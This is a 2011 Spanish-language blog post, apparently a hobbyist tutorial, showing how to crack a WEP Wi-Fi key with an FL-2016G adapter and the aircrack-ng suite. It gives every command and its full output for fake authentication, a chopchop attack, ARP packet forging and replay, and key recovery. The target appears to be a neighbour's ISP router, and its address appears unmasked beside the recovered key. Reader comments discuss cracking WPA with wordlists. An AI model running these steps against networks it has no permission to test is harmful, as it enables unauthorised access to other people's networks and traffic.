2011-11-30

USB FL-2016G con chipset RTL8187 en Ubuntu 11.10

Aquí se muestra el FL-2016G en acción desde Ubuntu en su versión 11.10. El FL-2016G es un dispositivo USB también conocido como el dragon que trae consigo el chipset rtl8187, inyecta muy bien, aunque me quedo con el alfa 2000mw, pero la ventaja es de que no es un dispositivo caro, yo la compre en 20 dolares por Ebay, el alfa me costo un poco mas pero si que valió la pena comprarla, me ha servido para todo, hasta como AP :).
Bueno como un usuario me ha enviado un mensaje preguntando como es el proceso para auditar con el FL-2016, aquí esta. Aunque el proceso es el mismo para todos los dispositivos, es cuestión de lanzar airmon-ng y mirar si detecta nuestro dispositivo USB, si no detecta podría ser necesaria parchear los drivers con el Compat-Wireless.

Bueno lo primero lanzamos airmon-ng. Para esto iniciamos el script airmon-ng tal como se muestra a continuación. Wlan2 es la interface como es reconocido nuestro dispositivo en Ubuntu.

root@computer:/home/delfi# airmon-ng start wlan2.
Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID Name
997 avahi-daemon
998 avahi-daemon
999 NetworkManager
19973 wpa_supplicant
21950 dhclient
Process with PID 21950 (dhclient) is running on interface wlan1

Interface Chipset  Driver

wlan1  Unknown  rt2800usb - [phy0]
wlan2  RTL8187  rtl8187 - [phy1]
(monitor mode enabled on mon0)
Una vez que hemos puesto el FL-2016G en modo monitor, podremos lanzar airodump-ng para escanear las redes que están a nuestro alcance para poder elegir un objetivo y centrarnos en una red en concreto.

root@computer:/home/delfi# airodump-ng mon0
CH 10 ][ Elapsed: 4 s ][ 2011-11-30 03:04                               
                                                                                                          
BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                     
                                                                                                          
08:76:FF:XX:XX:A4  -50       11        0    0   9  54e  WEP  WEP         INFINITUMXXXXA                           
64:16:F0:31:XX:CD  -61        9        0    0  11  54   WEP  WEP         INFINITUM74XX                             
00:18:3F:01:06:XX  -62        2        0    0  11  54 . WEP  WEP         INFINITUM97XX                             
00:21:7C:C6:XX:XX  -62        6        0    0   1  54 . WPA2 CCMP   PSK  Juanjo                                    
98:2C:BE:10:ED:72  -60        7        0    0   1  54   WEP  WEP         INFINITUMXX31                             
F4:C7:14:6F:AB:7C  -63        4        0    0  11  54e  WEP  WEP         GREGORIO                                  
5C:4C:A9:67:18:B4  -64        4        0    0   1  54e  WEP  WEP         INFINITUMXXb4                             
00:E0:4C:XX:53:XX  -67        2        0    0  11  54   WEP  WEP         PAKORP                                    
                                                                                                          
BSSID              STATION            PWR   Rate    Lost  Packets  Probes


Una vez elegido el objetivo, lanzamos el siguiente comando para decirle a airodump-ng que escuche con nuestro dispositivo USB em modo monitor (mon0) en el canal (11) donde esta trasmitiendo el punto de acceso (64:16:F0:31:68:CD), el parametro --write es el nombre del archivo de nuestra captura.

root@computer:/home/delfi# airodump-ng --bssid 64:16:F0:31:68:CD --channel 11 --write wifikey mon0
CH 11 ][ Elapsed: 5 mins ][ 2011-11-30 03:09                               
                                                                                                          
BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                 
                                                                                                          
64:16:F0:XX:XX:CD  -60   0     2286    29042   76  11  54   WEP  WEP    OPN  INFINITUM7XX9                         
                                                                                                          
BSSID              STATION            PWR   Rate    Lost  Packets  Probes                                          
                                                                                                          
64:16:F0:31:XX:XX  00:C0:CA:40:XX:XX    0    0 - 1   1317340   151601

Ahora lo que haremos es realizar una falsa autenticación con el Punto de Acceso Wifi para que acepte cualquier paquete que le enviemos. Para esto, en consola realizamos lo siguiente.

root@computer:/home/delfi# aireplay-ng --fakeauth 0 -e INFINITUM7XX9 -a 64:16:F0:31:68:CD -h 00:C0:CA:40:B8:3E mon0
03:04:54  Waiting for beacon frame (BSSID: 64:16:F0:31:68:CD) on channel 11
03:04:55  Sending Authentication Request (Open System)
03:04:55  Authentication successful
03:04:55  Sending Association Request
03:04:55  Association successful :-) (AID: 1)


Tal como podemos ver, nos hemos asociado correctamente. lanzamos el ataque chopchop con el siguiente comando --chopchop o -4. En este caso el paramentro--chopchop significa que realizaremos el ataque chopchop, -b la dirección MAC del punto de acceso, -h la dirección MAC de nuestro dispositivo inalambrico y el mon0 es tal como es reconocido nuestro dispositivo.

root@computer:/home/delfi# aireplay-ng --chopchop -b 64:16:F0:XX:XX:XX -h 00:C0:CA:XX:XX:3E mon0
03:04:58  Waiting for beacon frame (BSSID: 64:16:F0:31:68:CD) on channel 11
Read 3616 packets...

Size: 86, FromDS: 1, ToDS: 0 (WEP)

    BSSID  =  64:16:F0:XX:XX:CD
Dest. MAC  =  01:00:5E:00:XX:XX
Source MAC  =  64:16:F0:31:XX:XX

0x0000:  0842 0000 0100 5e00 0001 6416 f031 68cd  .B....^...d..1h.
0x0010:  6416 f031 68cd f089 e15e 4800 224d e95a  d..1h....^H."M.Z
0x0020:  f191 7a17 92fd 494c e866 d7fe 7200 d979  ..z...IL.f..r..y
0x0030:  8c57 92db d5ed 59c3 5a63 c78c e09c fc82  .W....Y.Zc......
0x0040:  0269 8709 952a 7d4a 443f 2139 3843 0fd5  .i...*}JD?!98C..
0x0050:  e2ff 3aea e1aa                           ..:...

Use this packet ? y

Saving chosen packet in replay_src-1130-030631.cap

Offset   85 ( 0% done) | xor = 89 | pt = 23 |   78 frames written in  1342ms
Offset   84 ( 1% done) | xor = 94 | pt = 75 |  489 frames written in  8297ms
Offset   83 ( 3% done) | xor = BE | pt = 54 | 1785 frames written in 30360ms
Offset   82 ( 5% done) | xor = 3E | pt = 04 |  579 frames written in  9843ms
Offset   81 ( 7% done) | xor = FF | pt = 00 |  667 frames written in 11338ms
Offset   80 ( 9% done) | xor = E2 | pt = 00 |   77 frames written in  1309ms
Offset   79 (11% done) | xor = D5 | pt = 00 |  239 frames written in  4064ms
Offset   78 (13% done) | xor = 0F | pt = 00 |  238 frames written in  4047ms
Offset   77 (15% done) | xor = 42 | pt = 01 |  650 frames written in 11048ms
Offset   76 (17% done) | xor = 38 | pt = 00 |  273 frames written in  4642ms
Offset   75 (19% done) | xor = 39 | pt = 00 |  133 frames written in  2249ms
Offset   74 (21% done) | xor = 21 | pt = 00 |  701 frames written in 11929ms
Offset   73 (23% done) | xor = 57 | pt = 68 |   57 frames written in   969ms
Offset   72 (25% done) | xor = 30 | pt = 74 |  418 frames written in  7103ms
Offset   71 (26% done) | xor = EA | pt = A0 |  606 frames written in 10304ms
Offset   70 (28% done) | xor = E5 | pt = 98 |  482 frames written in  8194ms
Offset   69 (30% done) | xor = 0A | pt = 20 |  244 frames written in  4149ms
Offset   68 (32% done) | xor = 95 | pt = 00 |  244 frames written in  4147ms
Offset   67 (34% done) | xor = E2 | pt = EB |  404 frames written in  6869ms
Offset   66 (36% done) | xor = 93 | pt = 14 |  185 frames written in  3136ms
Offset   65 (38% done) | xor = E9 | pt = 80 |  436 frames written in  7408ms
Offset   64 (40% done) | xor = DE | pt = DC |  197 frames written in  3360ms
Offset   63 (42% done) | xor = 82 | pt = 00 |  192 frames written in  3264ms
Offset   62 (44% done) | xor = FC | pt = 00 |  194 frames written in  3297ms
Offset   61 (46% done) | xor = 9C | pt = 00 |  815 frames written in 13856ms
Offset   60 (48% done) | xor = E0 | pt = 00 | 1468 frames written in 24945ms
Offset   59 (50% done) | xor = 17 | pt = 9B |  316 frames written in  5383ms
Offset   58 (51% done) | xor = 29 | pt = EE |  230 frames written in  3909ms
Offset   57 (53% done) | xor = 07 | pt = 64 |   76 frames written in  1293ms
Offset   56 (55% done) | xor = 4B | pt = 11 |   99 frames written in  1684ms
Offset   55 (57% done) | xor = C2 | pt = 01 |  120 frames written in  2037ms
Offset   54 (59% done) | xor = 59 | pt = 00 |  192 frames written in  3266ms
Offset   53 (61% done) | xor = ED | pt = 00 |  177 frames written in  2998ms
Offset   52 (63% done) | xor = 35 | pt = E0 |   63 frames written in  1081ms
Offset   51 (65% done) | xor = 25 | pt = FE |   75 frames written in  1272ms
Offset   50 (67% done) | xor = 93 | pt = 01 |  147 frames written in  2503ms
Offset   49 (69% done) | xor = FF | pt = A8 |  229 frames written in  3892ms
Offset   48 (71% done) | xor = 4C | pt = C0 |  179 frames written in  3043ms
Offset   47 (73% done) | xor = EF | pt = 96 |  690 frames written in 11730ms
Offset   46 (75% done) | xor = D1 | pt = 08 |  295 frames written in  5014ms
Offset   45 (76% done) | xor = 02 | pt = 02 |  575 frames written in  9775ms
Offset   44 (78% done) | xor = 73 | pt = 01 |  249 frames written in  4233ms
Offset   43 (80% done) | xor = FE | pt = 00 |   67 frames written in  1140ms
Offset   42 (82% done) | xor = D7 | pt = 00 |  296 frames written in  5020ms
Offset   41 (84% done) | xor = C5 | pt = A3 |   97 frames written in  1660ms
Offset   40 (86% done) | xor = E6 | pt = 0E |   20 frames written in   341ms
Offset   39 (88% done) | xor = 50 | pt = 1C |  370 frames written in  6293ms
Offset   38 (90% done) | xor = 49 | pt = 00 |  228 frames written in  3869ms
Offset   37 (92% done) | xor = FD | pt = 00 |  231 frames written in  3930ms
Offset   36 (94% done) | xor = D7 | pt = 45 |  789 frames written in 13414ms
Offset   35 (96% done) | xor = 17 | pt = 00 |  229 frames written in  3892ms
Offset   34 (98% done) | xor = 72 | pt = 08 |  147 frames written in  2499ms

Saving plaintext in replay_dec-1130-030713.cap
Saving keystream in replay_dec-1130-030713.xor

Completed in 39s (1.23 bytes/s)


Como se mira en el código e imagen anterior, tuvimos éxito con el ataque chopchop. El archivo llamado keystream in replay_dec-1130-030713.xor lo utilizaremos para generar un paquete ARP con el famoso packetforge-ng. Nuestro objetivo es que el punto de acceso reenvié continuamente el paquete arp inyectado. Cuando lo reenvié obtendremos un nuevo IV (vector de inicialización). Todos estos IVs los usaremos para obtener la clave WEP.

root@computer:/home/delfi# packetforge-ng -0 -a 64:16:F0:31:XX:XX -h 00:C0:CA:XX:XX:XX -k 255.255.255.255 -l 255.255.255.255 -yreplay_dec-1130-030713.xor -w ARP
Wrote packet to: ARP

Ahora la inyección del paquete ARP.
root@computer:/home/delfi# aireplay-ng -2 -r ARP mon0
No source MAC (-h) specified. Using the device MAC (00:C0:CA:40:B8:3E)
Size: 68, FromDS: 0, ToDS: 1 (WEP)

    BSSID  =  64:16:F0:XX:XX:XX
Dest. MAC  =  FF:FF:FF:FF:FF:FF
Source MAC  =  00:C0:CA:40:XX:XX

0x0000:  0841 0201 6416 f031 68cd 00c0 ca40 b83e  .A..d..1h....@.>
0x0010:  ffff ffff ffff 8001 e15e 4800 224d e95a  .........^H."M.Z
0x0020:  f191 7a11 d7fc 4150 e0c1 d7ff 73c2 1baf  ..z...AP....s...
0x0030:  f4c1 6cda ca12 59c2 4b07 2917 1f63 037d  ..l...Y.K.)..c.}
0x0040:  2df5 fa27                                -..'

Use this packet ? y

Saving chosen packet in replay_src-1130-030729.cap
You should also start airodump-ng to capture replies.
Por ultimo, una vez capturado los suficientes #datas, lanzamos aircrack-ng.

delfi@computer:~$ aircrack-ng wifikey-01.cap

Opening wifikey-01.cap
Read 163102 packets.

#  BSSID              ESSID                     Encryption

1  64:16:F0:XX:XX:XX  INFINITUM7XX9             WEP (25237 IVs)

Choosing first network as target.

Opening wifikey-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 25237 ivs.
                                              Aircrack-ng 1.1

                              [00:00:07] Tested 83141 keys (got 25192 IVs)

KB    depth   byte(vote)
0    0/  1   37(41728) 47(35840) 3C(34560) EA(33280) 68(32768) 93(32768) 0E(32512) DC(32512) 39(32256)
1   23/ 26   BD(30464) 7F(30208) 9A(30208) BB(30208) BE(30208) C4(30208) 76(29696) B1(29696) D4(29696)
2    0/ 19   61(34560) 16(33536) 2F(33536) ED(33024) 19(33024) EF(32768) 01(32512) 9D(32256) 9E(31488)
3    2/ 25   31(33280) 08(33280) 77(33024) C9(32768) D3(32768) B9(32512) 74(32256) BE(31744) 48(31744)
4    0/  7   63(36096) A2(33024) BB(32512) 51(32512) C6(32256) A4(32000) F5(32000) 07(31744) 1F(31744)

           KEY FOUND! [ 37:63:61:31:63 ] (ASCII: 7ca1c )
Decrypted correctly: 100%


Video: USB FL-2016G en acción desde Ubuntu 11.10

Vídeo Online
https://www.youtube.com/watch?v=rFUMPgYkGPM

6 comentarios:

  1. Hola amigo como estas, muy util tu post, no me sabia bien los pasos para hacerlo con este programa. Queria consultarte si alguna vez y por esos momentos de bondad suprema que tiene la vida, pudiste descifrar una clave del tipo WPA. Probe muchas veces con este mismo chipset (8187), que va perfecto, y encontrar una clave WEP es una tarea muy grata incluso. Pero las WPA son un reto mayor, por eso queria saber si directamente dejo de intentar jeje. Ojala ande todo bien, un abrazo.

    ResponderEliminar
  2. Buenas Jeremias.

    Muchas gracias, un WPA solo en una ocasión pude realizarlo, ya que la clave era sencilla, 123456 y ya :D

    Pero con claves mas complicadas y mas largas en caracteres es mas tardado, podría tardas días, ayudaría tambien el tener un buen diccionario de palabras (wordlist).

    Haber si un día de estos tengo tiempo y realizo un vídeo del crakeo de wpa.

    saludos!

    ResponderEliminar
  3. Hola Delfi como te va, espero que todo bien. Hoy recibi la Awus de 2w, tenia la mortal certeza de que me iba a llegar una que no es original, pero menos mal que no che, hasta el holograma y todo. La APA-M04 vino por separado en el mismo paquete, todo sellado y cada uno en su caja. Tenias razon! el Wifiway reconocio el chipset enseguida sin instalar nada mas, ya hice 2 auditorias y todo de 10, la ventaja con esta antena es que muestra los niveles reales de señal, igual que ocurre en las placas wifi que vienen en las netbook. Yo tengo una Acer D250, es poco potente pero no la cambio por nada, y tambien muestra los niveles de verdad, cosa que no pasa con los adaptadores Nisuta. Gracias por guiarme con la compra, uno no sabe si comprar o no cuando todos dicen que no anda bien, pero esta buenisima! un abrazo.

    ResponderEliminar
  4. Hola Jeremias, me alegra que la compra haya salido todo bien. Eso de mostrar los niveles de señales es muy cierto, yo tengo otros 3 dispositivos USB, un Kasens g5000, el WifiSky y el FL-2016G que te engañan en cuanto a los niveles de señal, a la hora de conectar nada mas no conectan, en cambio el alfa 2W todo bien :) Bueno Jeremia recibe de mi parte un fuerte abrazo.
    Saludos!

    ResponderEliminar
  5. hoy porque no se puede inyectar ni crackear redes WEP que en la columna de MB tienen la letra e ejemplo 54e ...... sabes como crackearlas

    ResponderEliminar
  6. Espera a que conecte un cliente (station) y lanzar el ataque, seguro que lo logras.

    ResponderEliminar